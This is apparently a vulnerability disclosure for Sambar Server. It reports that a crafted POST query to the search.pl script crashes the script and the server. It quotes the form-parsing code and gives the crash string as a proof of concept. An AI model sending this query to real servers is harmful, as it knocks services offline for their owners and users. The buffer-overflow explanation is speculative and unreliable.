Sambar Server : Crashing service with search.pl

[Lorenzo Manuel Hernandez Garcia-Hierro <security () lorenzohgh com>]

--------------------
Product: Sambar Server
Vendor: Sambar Technologies 
Versions:
         VULNERABLE
         
         - 6.0 ?
         - 5.x
         - 4.x
         - 3.x
        
         NOT VULNERABLE
        
         - ?
---------------------

Description:

Multi-threaded, extensible Application Server with highly programmable 
API 
Virtual domain support (currently name based) with independent 
document/CGI directories, log files, and error templates. 
HTTP 1.1 KeepAlive (performance enhancing) and byte-range (download 
resume) support 
Dynamic content compression 
HTTPS (SSL) 128-bit encrytion support (OpenSSL included) 
Integrated Log File Analysis 
Documents and images can be cached in memory for performance 
Document and CGI directory aliasing 
Customizable and scriptable error templates allow database and email 
notification.

Graphing performance monitors and automatic log file report generation. 
Bandwidth and per-user throttling. 
Dynamic pages using CGI, ISAPI, JAVA, and SSI. Internal ODBC allows 
connections to most database types (Oracle, MS-SQL, MySQL, Access, etc) 
Built-in SQL RDBMS (SQLite) for prototyping and modest projects. 

-----------------------------------------
SECURITY HOLES FOUND and PROOFS OF CONCEPT:
-----------------------------------------
 
I encountered a buffer overflow vulnerability in the search system by 
perl file ( search.pl ) , with this you can
corrupt the stack . The failure occurs when you send a specially crafted 
query.

---------------------
| BUFFER OVERFLOW   |
| IN SEARCH.PL      |
---------------------

Code with the hole:
_______________________________________________________
# Buffer the POST content
 read(STDIN, $buffer, $ENV{'CONTENT_LENGTH'});

 # Process the name=value argument pairs
 my $pair;
 my $name;
 my $value;
 my @args = split(/&/, $buffer);

 foreach $pair (@args) 
 {
  ($name, $value) = split(/=/, $pair);

  # Unescape the argument value 
  $value =~ tr/+/ /;                <---  LOOK HERE
  $value =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;

  # Save the name=value pair for use below.
  $FORM{$name} = $value;
 }
________________________________________________________

 
Proof of Concepts:

You must do a request in post mode to the search.pl script with the 
following content:


QUERY TO USE FOR THE BUFFER OVERFLOW:

.+.+a+.+b+.+c+.+d+.+E+.+D+.+gh+sd+.+sF+.+.+G0+.+H0+.+J1+.+L2+.+2M+.+G0

You can send other queries including + and . too but you must include 
other characters.

I think that the problem is in the form that search.pl recognices the 
query logic operator and the +.
The search.pl crashes and the sambar server crashes too, if you continue 
sending this requests the server machine
must be restarted. The search.pl script doesn't have a limit of 
characters in the query.

-----------
| CONTACT |
-----------

Lorenzo Hernandez Garcia-Hierro
 --- Computer Security Analyzer ---
 --Nova Projects Professional Coding--
 PGP: Keyfingerprint
 B6D7 5FCC 78B4 97C1  4010 56BC 0E5F 2AB2
 ID: 0x9C38E1D7
 **********************************
 www.novappc.com
 security.novappc.com
 www.lorenzohgh.com
 ______________________